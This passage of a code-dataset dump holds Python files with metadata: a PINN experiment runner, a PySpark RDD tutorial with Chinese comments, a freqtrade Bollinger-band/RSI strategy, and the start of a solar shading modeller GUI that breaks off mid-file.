"ttest.py", "file_ext": "py", "file_size_in_byte": 2387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.sub", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 35, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.average", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.average", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.stats.ttest_rel", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.average", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 67, "usage_type": "call"}, {"api_name": "scipy.stats.ttest_rel", 
"line_number": 68, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.average", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "40098155449", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 24 16:44:59 2021\n\n@author: rober\n\"\"\"\nimport pickle\nimport sys\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom experiments.Models.CVPinn import CVPinn\nfrom experiments.Models.FEM import FEM\nfrom experiments.Models.RescalingVariationalPinn import RescalingVariationalPinn\nfrom experiments.Models.VanillaCurriculumLearning import VanillaCurriculumPinn\nfrom experiments.Models.VanillaPinn import VanillaPinn\nfrom experiments.Models.VariationalPinn import VariationalPinn\nfrom experiments.Models.VariationalPinnExactSampler import VariationalPinnExactSampler\nfrom experiments.Models.VariationalPinn_minimim_on_u import VariationalPinnMinOnU\nfrom experiments.utils import g, n, PlusX, get_prediction_domain\nfrom lib.IntelligentModels.NNFlow import NNFlow\nfrom lib.utils import Bounds, NamedPartial\n\n\n# os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n# tf.get_logger().setLevel('INFO')\n\n\ndef experiment(experiment_type, repetition, epsilon, n_train_r, sampler, float_precision, k, alpha, g, n,\n r_weight_proportion=0.5, test_factor=10):\n tf.set_random_seed(repetition)\n np.random.seed(repetition)\n\n x_bounds = Bounds(lower=0, upper=1)\n\n t0 = time.time()\n e = experiment_type(epsilon=epsilon, potential=PlusX(), g=g, alpha=alpha, k=k, n=n)\n results = e.experiment(\n n_samplings=1,\n n_train_r=n_train_r,\n r_weight_proportion=r_weight_proportion,\n max_samplings=1,\n n_iters_per_sampling=1000000,\n coords2predict=get_prediction_domain([x_bounds], num_per_dim2pred=n_train_r * test_factor),\n x_bounds=x_bounds,\n intelligent_model=lambda: NNFlow(hidden_layers=(10, 10),\n limit_zero=False,\n float_precision=float_precision), # True = NN*x(1-x)\n sampler=sampler\n )[0]\n t = time.time() - t0\n\n return results, t\n\n\nif __name__ == \"__main__\":\n path, experiment_name, epsilon, repetition, n_train_r, sampler, float_precision, k, alpha, r_weight_proportion, \\\n test_factor = sys.argv[1:]\n filename = \"{}/{}_{}_{}_{}_{}_{}.pickle\".format(path, experiment_name, epsilon, repetition, n_train_r, sampler,\n float_precision)\n\n print(\"Doing experiment: \", filename)\n experiment_type = {\n \"FEM\": FEM,\n \"VanillaPinn\": VanillaPinn,\n \"VanillaCurriculumPinn10\": NamedPartial(VanillaCurriculumPinn, num_epsilons=10),\n \"VanillaCurriculumPinn20\": NamedPartial(VanillaCurriculumPinn, num_epsilons=20),\n \"CVPinn\": CVPinn,\n \"VariationalPinn\": VariationalPinn,\n \"VariationalPinnExpTrue\": NamedPartial(VariationalPinn, exp_integration=True),\n \"VariationalPinnExactSampler\": VariationalPinnExactSampler,\n \"VariationalPinnMinOnU\": VariationalPinnMinOnU,\n \"VariationalRescaling\": RescalingVariationalPinn\n }[experiment_name]\n epsilon = float(epsilon)\n repetition = int(repetition)\n n_train_r = int(n_train_r)\n sampler = np.linspace if \"linspace\" in sampler.lower() else np.random.uniform\n # float_precision = getattr(tf, \"float{}\".format(float_precision))\n float_precision = {16: tf.float16, 32: tf.float32, 64: tf.float64}[int(float_precision)]\n pred, t_fit = experiment(\n experiment_type=experiment_type,\n repetition=repetition,\n epsilon=epsilon,\n n_train_r=n_train_r,\n sampler=sampler,\n float_precision=float_precision,\n k=float(k),\n alpha=float(alpha),\n g=g,\n n=n,\n r_weight_proportion=float(r_weight_proportion),\n test_factor=int(test_factor)\n )\n\n with open(filename, \"wb\") as f:\n pickle.dump({\"pred\": pred, \"t\": t_fit}, f)\n", "repo_name": 
"agussomacal/ConDiPINN", "sub_path": "src/experiments/experiment_parallel_sequential.py", "file_name": "experiment_parallel_sequential.py", "file_ext": "py", "file_size_in_byte": 3781, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.set_random_seed", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 34, "usage_type": "attribute"}, {"api_name": "lib.utils.Bounds", "line_number": 36, "usage_type": "call"}, {"api_name": "time.time", "line_number": 38, "usage_type": "call"}, {"api_name": "experiments.utils.PlusX", "line_number": 39, "usage_type": "call"}, {"api_name": "experiments.utils.g", "line_number": 39, "usage_type": "name"}, {"api_name": "experiments.utils.n", "line_number": 39, "usage_type": "name"}, {"api_name": "experiments.utils.get_prediction_domain", "line_number": 46, "usage_type": "call"}, {"api_name": "lib.IntelligentModels.NNFlow.NNFlow", "line_number": 48, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 60, "usage_type": "attribute"}, {"api_name": "experiments.Models.FEM.FEM", "line_number": 66, "usage_type": "name"}, {"api_name": "experiments.Models.VanillaPinn.VanillaPinn", "line_number": 67, "usage_type": "name"}, {"api_name": "lib.utils.NamedPartial", "line_number": 68, "usage_type": "call"}, {"api_name": "experiments.Models.VanillaCurriculumLearning.VanillaCurriculumPinn", "line_number": 68, "usage_type": "argument"}, {"api_name": "lib.utils.NamedPartial", "line_number": 69, "usage_type": "call"}, {"api_name": "experiments.Models.VanillaCurriculumLearning.VanillaCurriculumPinn", "line_number": 69, "usage_type": "argument"}, {"api_name": "experiments.Models.CVPinn.CVPinn", "line_number": 70, "usage_type": "name"}, {"api_name": "experiments.Models.VariationalPinn.VariationalPinn", "line_number": 71, "usage_type": "name"}, {"api_name": "lib.utils.NamedPartial", "line_number": 72, "usage_type": "call"}, {"api_name": "experiments.Models.VariationalPinn.VariationalPinn", "line_number": 72, "usage_type": "argument"}, {"api_name": "experiments.Models.VariationalPinnExactSampler.VariationalPinnExactSampler", "line_number": 73, "usage_type": "name"}, {"api_name": "experiments.Models.VariationalPinn_minimim_on_u.VariationalPinnMinOnU", "line_number": 74, "usage_type": "name"}, {"api_name": "experiments.Models.RescalingVariationalPinn.RescalingVariationalPinn", "line_number": 75, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.random", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.float16", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.float64", "line_number": 82, "usage_type": "attribute"}, {"api_name": "experiments.utils.g", "line_number": 92, "usage_type": "name"}, {"api_name": "experiments.utils.n", "line_number": 93, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 99, "usage_type": "call"}]}
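The runner record above dispatches a CLI string to an experiment class through a dict, using the repo's NamedPartial to pre-bind constructor arguments such as num_epsilons. A generic sketch of that dispatch pattern, with functools.partial standing in for NamedPartial (an assumed equivalence based only on how it is called in the record, not the repo's actual API):

from functools import partial

class VanillaCurriculumPinn:
    def __init__(self, num_epsilons):
        self.num_epsilons = num_epsilons

# Map the CLI argument to a class or a pre-configured factory
registry = {
    "VanillaCurriculumPinn10": partial(VanillaCurriculumPinn, num_epsilons=10),
    "VanillaCurriculumPinn20": partial(VanillaCurriculumPinn, num_epsilons=20),
}
experiment_type = registry["VanillaCurriculumPinn10"]
print(experiment_type().num_epsilons)  # 10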
+{"seq_id": "36719572007", "text": "\"\"\"\n1. https://sparkbyexamples.com/pyspark-rdd\n2. https://kknews.cc/zh-tw/code/j24qnle.html\n3. Official RDD programming guide https://spark.apache.org/docs/latest/rdd-programming-guide.html\nRDD - Resilient Distributed Dataset 可回复式(或称弹性式)分散式资料集\n\n这要说到Hadoop,Hadoop这篇论文是Google实作的一个档案系统外加Map Reduce\n\nHadoop解决了分散工作时,某台计��节点换掉时的补救机制,主要思想也很简单,\n把计算过程(或是中间值)存到别台计算节点上,每一台都多花一些档案空间来做这些事,\n并且识别是否有计算节点坏掉,重新读取值中间计算结果的机制\n\nSpark是In memory的分散式架构,自然也继承了Hadoop这个设计特色,\n并且让资料在内存存不下时,暂存到档案系统中,\nRDD资料集格式已经广泛被分散式储存/计算框架所采用\n\n对比来说,RDDs其实就像Python的list,啥都能装\n但RDD可以被分散在不同机器上,不同行程中,并且RDD可以被平行执行\n\n对RDD的操作最常用的就是map() filter() persist()\n\nPySpark RDD的特色\n\n1. In Memory \n 对比Hadoop的Map Reduce(写到硬盘中),saprk走内存,\n 意味着更快的存取,不会有IO bound\n2. Immutability\n 每一个RDD都是不可变,每经过一次Transform,就会开一个新的RDD,\n 并记得上一个RDD和新的RDD的关系\n3. Fault Tolerance\n 在HDFS, S3上跑任意的RDD坏掉时,会从其他计算节点找回资料,\n 并且Pyspark任务失败时会从新尝试\n4. Lazy Evolution\n RDD transform是先说明运算规则(map),在进行转换(transform),\n 和旧版tensorflow是同样的,中间使用DAG来记录顺序关系\n5. Partitioning\n 当你从资料建立RDD时,预设会把它做partition,\n 预设是看你有几个core就做几个partition\n\n6. SparkContext有非常多rdd的方法可以叫\n 1. parallelize() - create rdd from list\n 2. textFile() - (.txt file) into RDD\n 3. wholeTextFiles() - PairRDD with key : filepath, value : file content\n 4. emptyRDD - attribute, RDD with no data, no partition\n 5. parallelize([], 10) - emptyRDD with 10 partitions.\n\nDig more \nhttps://sparkbyexamples.com/pyspark-rdd/\n\n\"\"\"\n\n# 建立RDD\n\n# 1. parallelizing from existing collection\n# 2. (Often used for production application)\n# referencing a dataset in an external sotrage ststem(HDFS, S3, HBase)\n\nfrom pyspark.sql import SparkSession\n\nspark = (\n SparkSession.builder.master(\"local[1]\").appName(\"SparkByExamples.com\").getOrCreate()\n)\n\n\ndata = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\nrdd = spark.sparkContext.parallelize(data, 4)\nprint(\"Method of RDD : \", dir(rdd))\nprint(\"initial partition count : \", str(rdd.getNumPartitions()))\nprint(\"RDD count : \" + str(rdd.count()))\nprint(\"Whole list is : \", rdd.collect())\n", "repo_name": "YLTsai0609/pyspark_101", "sub_path": "004_rdd_creation.py", "file_name": "004_rdd_creation.py", "file_ext": "py", "file_size_in_byte": 2856, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyspark.sql.SparkSession.builder.master", "line_number": 61, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 61, "usage_type": "name"}]}
+{"seq_id": "73896180008", "text": "import talib.abstract as ta\nfrom pandas import DataFrame\nfrom technical.util import resample_to_interval, resampled_merge\n\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\nfrom freqtrade.strategy import IStrategy, merge_informative_pair\n\n\nclass BBRSIS(IStrategy):\n \"\"\"\n Default Strategy provided by freqtrade bot.\n You can override it with your own strategy\n \"\"\"\n\n # Minimal ROI designed for the strategy\n minimal_roi = {\n\t\"0\": 0.30,\n }\n\n # Optimal stoploss designed for the strategy\n stoploss = -0.99\n\n # Optimal ticker interval for the strategy\n ticker_interval = '5m'\n\n # Optional order type mapping\n order_types = {\n 'buy': 'limit',\n 'sell': 'limit',\n 'stoploss': 'limit',\n 'stoploss_on_exchange': False\n }\n\n # Optional time in force for orders\n order_time_in_force = {\n 'buy': 'gtc',\n 'sell': 'gtc',\n }\n \n def get_ticker_indicator(self):\n return int(self.timeframe[:-1])\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n :param dataframe: Raw data from the exchange and parsed by parse_ticker_dataframe()\n :param metadata: Additional information, like the currently traded pair\n :return: a Dataframe with all mandatory indicators for the strategies\n \"\"\"\n\n # Momentum Indicator\n # ------------------------------------\n # RSIs\n dataframe['sma5'] = ta.SMA(dataframe, timeperiod=5)\n dataframe['sma75'] = ta.SMA(dataframe, timeperiod=75)\n dataframe['sma200'] = ta.SMA(dataframe, timeperiod=200)\n \n dataframe_short = resample_to_interval(dataframe, self.get_ticker_indicator() * 3)\n dataframe_medium = resample_to_interval(dataframe, self.get_ticker_indicator() * 6)\n dataframe_long = resample_to_interval(dataframe, self.get_ticker_indicator() * 10)\n \n dataframe_short['rsi'] = ta.RSI(dataframe_short, timeperiod=20)\n dataframe_medium['rsi'] = ta.RSI(dataframe_medium, timeperiod=20)\n dataframe_long['rsi'] = ta.RSI(dataframe_long, timeperiod=20)\n \n dataframe = resampled_merge(dataframe, dataframe_short)\n dataframe = resampled_merge(dataframe, dataframe_medium)\n dataframe = resampled_merge(dataframe, dataframe_long)\n \n dataframe['rsi'] = ta.RSI(dataframe, timeperiod=20)\n \n dataframe.fillna(method='ffill', inplace = True)\n \n # Bollinger bands\n bollinger = qtpylib.bollinger_bands(qtpylib.typical_price(dataframe), window=20, stds=3)\n dataframe['bb_lowerband'] = bollinger['lower']\n dataframe['bb_middleband'] = bollinger['mid']\n dataframe['bb_upperband'] = bollinger['upper']\n\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :param metadata: Additional information, like the currently traded pair\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[\n (\n (dataframe['close'] < dataframe['bb_lowerband']) &\n (dataframe['sma5'] >= dataframe['sma75']) &\n (dataframe['sma75'] >= dataframe['sma200']) &\n (dataframe['rsi'] < (dataframe['resample_{}_rsi'.format(self.get_ticker_indicator() * 3)] - 5)) &\n (dataframe['volume'] > 0)\n ),\n 'buy'] = 1\n\n return dataframe\n\n def 
populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :param metadata: Additional information, like the currently traded pair\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[\n (\n (dataframe['close'] > dataframe['bb_middleband']) &\n (dataframe['rsi'] > dataframe['resample_{}_rsi'.format(self.get_ticker_indicator()*3)] + 5) &\n (dataframe['rsi'] > dataframe['resample_{}_rsi'.format(self.get_ticker_indicator()*6)]) &\n (dataframe['rsi'] > dataframe['resample_{}_rsi'.format(self.get_ticker_indicator()*10)]) &\n (dataframe['volume'] > 0)\n ),\n 'sell'] = 1\n return dataframe\n", "repo_name": "davidzr/freqtrade-strategies", "sub_path": "strategies/BBRSIS/BBRSIS.py", "file_name": "BBRSIS.py", "file_ext": "py", "file_size_in_byte": 4812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "freqtrade.strategy.IStrategy", "line_number": 9, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "name"}, {"api_name": "talib.abstract.SMA", "line_number": 57, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 57, "usage_type": "name"}, {"api_name": "talib.abstract.SMA", "line_number": 58, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 58, "usage_type": "name"}, {"api_name": "talib.abstract.SMA", "line_number": 59, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 59, "usage_type": "name"}, {"api_name": "technical.util.resample_to_interval", "line_number": 61, "usage_type": "call"}, {"api_name": "technical.util.resample_to_interval", "line_number": 62, "usage_type": "call"}, {"api_name": "technical.util.resample_to_interval", "line_number": 63, "usage_type": "call"}, {"api_name": "talib.abstract.RSI", "line_number": 65, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 65, "usage_type": "name"}, {"api_name": "talib.abstract.RSI", "line_number": 66, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 66, "usage_type": "name"}, {"api_name": "talib.abstract.RSI", "line_number": 67, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 67, "usage_type": "name"}, {"api_name": "technical.util.resampled_merge", "line_number": 69, "usage_type": "call"}, {"api_name": "technical.util.resampled_merge", "line_number": 70, "usage_type": "call"}, {"api_name": "technical.util.resampled_merge", "line_number": 71, "usage_type": "call"}, {"api_name": "talib.abstract.RSI", "line_number": 73, "usage_type": "call"}, {"api_name": "talib.abstract", "line_number": 73, "usage_type": "name"}, {"api_name": "freqtrade.vendor.qtpylib.indicators.bollinger_bands", "line_number": 78, "usage_type": "call"}, {"api_name": "freqtrade.vendor.qtpylib.indicators", "line_number": 78, "usage_type": "name"}, {"api_name": "freqtrade.vendor.qtpylib.indicators.typical_price", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 85, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "name"}]}
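The strategy record above computes RSI on 3x, 6x, and 10x coarser timeframes with technical.util's resample_to_interval/resampled_merge, then compares them against the base-timeframe RSI. A pandas-only sketch of the same resample-then-align idea, using synthetic prices and a simple moving average in place of RSI (all values below are made up for illustration):

import numpy as np
import pandas as pd

idx = pd.date_range("2021-01-01", periods=60, freq="5min")
close = pd.Series(100 + np.random.default_rng(0).normal(0, 1, 60).cumsum(), index=idx)

coarse = close.resample("15min").last()             # 3x coarser candles
coarse_sma = coarse.rolling(4).mean()               # indicator computed on the coarse frame
aligned = coarse_sma.reindex(idx, method="ffill")   # forward-fill back onto the 5min bars
print(aligned.tail())

Forward-filling is the key step: each fine-grained bar only sees the most recently *closed* coarse value, which is what the record's fillna(method='ffill', inplace=True) call accomplishes after merging.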
+{"seq_id": "34807277842", "text": "# ssm_v0.3 - solar shading modeller\r\n# New in v0.3 - Added GUI\r\n# New in v0.4 - Added StreetView Pano ID search tool\r\n\r\n# This program calculates how much solar irradiation is reduced due to shading by surrounding obstructions,\r\n# It requires the input of either 1. a hemispherical fisheye image taken upwards (true north aligned with image north,\r\n# or 2. a 360 deg spherical panorama (true north aligned with the left of the image)\r\n# Written by Bowen: fan_b@meng.ucl.ac.uk\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport csv\r\nimport PySimpleGUI as sg\r\nimport os\r\nimport re\r\nfrom math import *\r\nfrom PIL import Image\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nfrom resizeimage import resizeimage\r\n\r\n# Begin Pano ID search function\r\n\r\ndef get_pano_id(maps_url):\r\n pano_id = re.search('!1s(.*)!2e', maps_url)\r\n return pano_id.group(1)\r\n\r\n\r\n# End Pano ID search function\r\n\r\n\r\n# Begin geometry functions\r\n\r\ndef cylindrical_to_cartesian(distance, azimuth, height):\r\n azi_rad = np.deg2rad(azimuth)\r\n x_cart = distance * np.cos(azi_rad)\r\n y_cart = distance * np.sin(azi_rad)\r\n z_cart = height\r\n return x_cart,y_cart,z_cart\r\n\r\n\r\ndef cylindrical_to_horizontal(distance, height):\r\n elev_obj_rad = np.arctan((height/distance))\r\n elev_obj_deg = np.rad2deg(elev_obj_rad)\r\n return elev_obj_deg\r\n\r\n\r\ndef azimuth_to_elevation(azimuth_integer):\r\n elevation = linspace_elevations[azi_deg_rounded-1]\r\n print('Obstruction elevation: ', elevation, file=text_data)\r\n print('Obstruction elevation: ', elevation)\r\n return elevation\r\n\r\n# End geometry functions\r\n\r\n# Begin sun mapping and irradiation functions\r\n# These functions calculate the position of the sun at any point in time through the year\r\n\r\n\r\ndef solar_position_calc(day, hr, min):\r\n # Singapore latitude = 1.3521 degrees North\r\n # Singapore longitude = 103.8198 degrees East\r\n # Singapore timezone is +8 hours from UTC\r\n\r\n latitude = 1.3521\r\n lat_rad = np.deg2rad(latitude)\r\n longitude = 103.8198\r\n lon_rad = np.deg2rad(longitude)\r\n timezone = 8\r\n\r\n # Refer to the NOAA paper \"General Solar Position Calculations\"\r\n # https://www.esrl.noaa.gov/gmd/grad/solcalc/solareqns.PDF\r\n\r\n y = (2 * 3.14159265/365) * (day - 1 + (hr-12)/24)\r\n eqtime = 229.18 * (0.000075 + 0.001868 * np.cos(y) - 0.032077 * np.sin(y) - 0.014615 * np.cos(2 * y)\r\n - 0.040849 * np.sin(2 * y))\r\n declin = 0.006918 - 0.399912 * np.cos(y) + 0.070257 * np.sin(y) - 0.006758 * np.cos(2 * y) + 0.000907 \\\r\n * np.sin(2 * y) - 0.002697 * np.cos(3 * y) + 0.00148 * np.sin(3 * y)\r\n\r\n time_offset = eqtime + 4 * longitude - 60 * timezone\r\n\r\n # Compute true solar time\r\n tst = hr * 60 + min + time_offset\r\n # Compute solar hour angle\r\n ha_deg = (tst/4) - 180\r\n ha_rad = np.deg2rad(ha_deg)\r\n\r\n # Compute solar zenith\r\n cos_zen = np.sin(lat_rad) * np.sin(declin) + np.cos(lat_rad) * np.cos(declin) * np.cos(ha_rad)\r\n zen_rad = np.arccos(cos_zen)\r\n zen_deg = np.rad2deg(zen_rad)\r\n\r\n # Compute solar azimuth\r\n if ha_deg > 0:\r\n cos_pi_minus_azi = ((np.sin(lat_rad) * np.cos(zen_rad) - np.sin(declin)) / (np.cos(lat_rad) * np.sin(zen_rad)))\r\n pi_minus_azi = np.arccos(cos_pi_minus_azi)\r\n azi_deg = (180 + np.rad2deg(pi_minus_azi)) % 360\r\n\r\n else:\r\n cos_pi_minus_azi = ((np.sin(lat_rad) * np.cos(zen_rad) - np.sin(declin)) / (np.cos(lat_rad) * np.sin(zen_rad)))\r\n pi_minus_azi = 
np.arccos(cos_pi_minus_azi)\r\n azi_deg = (540 - np.rad2deg(pi_minus_azi)) % 360\r\n\r\n # Compute solar elevation to tell whether it is night or day\r\n elev_deg = 90 - zen_deg\r\n if elev_deg >= 0:\r\n night_or_day = 'Day'\r\n else:\r\n night_or_day = 'Night'\r\n\r\n zen_deg_rounded = int(round(zen_deg))\r\n azi_deg_rounded = int(round(azi_deg))\r\n elev_deg_rounded = int(round(elev_deg))\r\n\r\n print('Zenith: ',zen_deg_rounded, '\\nAzimuth: ',azi_deg_rounded,'\\nElevation: ',elev_deg_rounded,'\\n',night_or_day, file=text_data)\r\n print('Zenith: ',zen_deg_rounded, '\\nAzimuth: ',azi_deg_rounded,'\\nElevation: ',elev_deg_rounded,'\\n',night_or_day)\r\n\r\n return zen_deg_rounded, azi_deg_rounded, elev_deg_rounded, night_or_day\r\n\r\n\r\ndef insolation(sun_zenith):\r\n sun_zenith_radians = np.deg2rad(sun_zenith)\r\n solar_constant = 1362 # watts per square meter\r\n insolation = solar_constant * np.cos(sun_zenith_radians)\r\n\r\n return insolation\r\n\r\n# End sun mapping and irradiation functions\r\n\r\n# Begin image manipulation functions\r\n# These functions trace the input image into an array of azimuth and elevation values\r\n# Adapted from the PySolar library\r\n\r\n\r\ndef squareImage(im):\r\n (width, height) = im.size\r\n box = ((width - height) / 2, 0, (width + height) / 2, height)\r\n return im.crop(box)\r\n\r\n\r\ndef despherifyImage(im):\r\n (width, height) = im.size\r\n half_width = int(im.size[0] / 2)\r\n half_height = int(im.size[1] / 2)\r\n inpix = im.load()\r\n out = Image.new(\"L\", (width, half_height))\r\n outpix = out.load()\r\n full_circle = 1000.0 * 2 * pi\r\n for r in range(half_width):\r\n for theta in range(int(full_circle)):\r\n (inx, iny) = (round(r * cos(theta / 1000.0)) + half_width, round(r * sin(theta / 1000.0)) + half_width)\r\n (outx, outy) = (width - width * (theta / full_circle) - 1, r)\r\n outpix[outx, outy] = inpix[inx, iny]\r\n return out\r\n\r\n\r\ndef differentiateImageColumns(im):\r\n (width, height) = im.size\r\n pix = im.load()\r\n for x in range(width):\r\n for y in range(height - 1):\r\n pix[x, y] = min(10 * abs(pix[x, y] - pix[x, y + 1]), 255)\r\n return im\r\n\r\n\r\ndef redlineImage(im, threshold):\r\n (width, height) = im.size\r\n imgcsv_azimuth = []\r\n imgcsv_elevation = [0] * width\r\n pix = im.load()\r\n for x in range(width):\r\n for y in range(height - 1):\r\n (R, G, B) = pix[x, y]\r\n if R + G + B > threshold:\r\n pix[x, y] = (255, 0, 0)\r\n imgcsv_elevation[x] = ((height-y)/height) * 90\r\n break\r\n imgcsv_azimuth.append(x)\r\n return im, imgcsv_azimuth, imgcsv_elevation\r\n\r\n# End image manipulation functions\r\n\r\n# Begin program operation\r\n\r\n# Begin experimental GUI code\r\n\r\nlayout = [[sg.Text('Google Maps URL:', size=(18,1)), sg.Input(key='maps_url')],\r\n [sg.Text('StreetView Pano ID:', size=(18,1)), sg.Input(key='pano_id')],\r\n [sg.Text('', size=(18,1)), sg.Button('Get Pano ID', size=(12,1))],\r\n [sg.Text('Location name:', size=(18,1)), sg.Input(key='location_name')],\r\n [sg.Text('Image type:', size=(18,1)),\r\n sg.Radio('360 deg panorama', \"RADIO1\", default=True, key='pano'),\r\n sg.Radio('Hemispherical fisheye', \"RADIO1\", key='fisheye')],\r\n [sg.Text('Select image file:', size=(18,1)), sg.Input(key='img_filepath'),\r\n sg.FileBrowse(file_types=((\"Images\", \".jpg .png\"),))],\r\n [sg.Text('Output folder:', size=(18,1)), sg.Input(key='output_folder'), sg.FolderBrowse()],\r\n [sg.Text('Sky tracer sensitivity:', size=(18, 1)),\r\n sg.Slider(range=(1, 700), default_value=350, size=(20, 15), 
orientation='horizontal',\r\n                     key='sensitivity_slider', enable_events=True, disable_number_display=True),\r\n           sg.T('350', key='sensitivity_value', size=(4, 1))],\r\n          [sg.Text('', size=(18,1)), sg.Button('Test sensitivity', size=(12,1))],\r\n          [sg.Text('Set computation interval:', size=(18,1)),\r\n           sg.Slider(range=(1,60), default_value=5, size=(20,15), orientation='horizontal',\r\n                     key='interval_slider', enable_events=True, disable_number_display=True),\r\n           sg.T('5', key='interval_value', size=(4,1))],\r\n          [sg.Text('', size=(18,1)), sg.Button('Compute', size=(12,1))]\r\n          ]\r\n\r\nwindow = sg.Window('Solar Shading Modeller', layout)\r\n\r\nwhile True:  # Event Loop\r\n    event, values = window.Read()\r\n    # print(event, values)\r\n\r\n    if event in ('sensitivity_slider', 'interval_slider'):\r\n        window.Element('sensitivity_value').Update(int(values['sensitivity_slider']))\r\n        window.Element('interval_value').Update(int(values['interval_slider']))\r\n\r\n    if event is None:\r\n        break\r\n\r\n    if event == 'Get Pano ID':\r\n        try:\r\n            window.Element('pano_id').Update(get_pano_id(values['maps_url']))\r\n        except AttributeError:\r\n            sg.Popup('Check that the URL is valid - copy from Google Maps StreetView')\r\n\r\n    if event == 'Test sensitivity':\r\n        try:\r\n            path_Image = values['img_filepath']\r\n            threshold = values['sensitivity_slider']\r\n\r\n            if values['pano']:\r\n                im = Image.open(path_Image).convert(\"L\")\r\n                d = differentiateImageColumns(im).convert(\"RGB\")\r\n\r\n            elif values['fisheye']:\r\n                im = Image.open(path_Image).convert(\"L\")\r\n                im = squareImage(im)\r\n                lin = despherifyImage(im)\r\n                d = differentiateImageColumns(lin).convert(\"RGB\")\r\n\r\n            img_resized = resizeimage.resize_width(d, 360)\r\n\r\n            r, imgcsv_azimuth, imgcsv_elevation = redlineImage(img_resized, threshold)\r\n\r\n            r.show()\r\n\r\n            linspace_azimuths = imgcsv_azimuth\r\n            linspace_elevations = imgcsv_elevation\r\n\r\n        except AttributeError:\r\n            sg.Popup('Check that you have provided the image file path')\r\n        except FileNotFoundError:\r\n            sg.Popup('File not found: Check that you have provided a correct image file path')\r\n\r\n    if event == 'Compute':\r\n        # Code here also in sensitivity tester\r\n        try:\r\n            # Create target Directory\r\n            os.mkdir(values['output_folder'] + '/' + values['location_name'])\r\n            print(\"Directory \", values['output_folder'] + '/' + values['location_name'], \" Created \")\r\n        except FileExistsError:\r\n            print(\"Directory \", values['output_folder'] + '/' + values['location_name'], \" already exists\")\r\n            sg.Popup(\"Directory \", values['output_folder'] + '/' + values['location_name'], \" already exists\")\r\n        except PermissionError:\r\n            sg.Popup('Check that the location name, file path, and output folder path are all filled in')\r\n        except FileNotFoundError:\r\n            sg.Popup('File/folder not found: Check that you have provided a correct image and output folder path')\r\n\r\n        else:\r\n            path_Image = values['img_filepath']\r\n            threshold = values['sensitivity_slider']\r\n\r\n            if values['pano']:\r\n                im = Image.open(path_Image).convert(\"L\")\r\n                d = differentiateImageColumns(im).convert(\"RGB\")\r\n\r\n            elif values['fisheye']:\r\n                im = Image.open(path_Image).convert(\"L\")\r\n                im = squareImage(im)\r\n                lin = despherifyImage(im)\r\n                d = differentiateImageColumns(lin).convert(\"RGB\")\r\n\r\n            img_resized = resizeimage.resize_width(d, 360)\r\n            img_resized.save(values['output_folder'] + '/' + values['location_name'] + '/' + 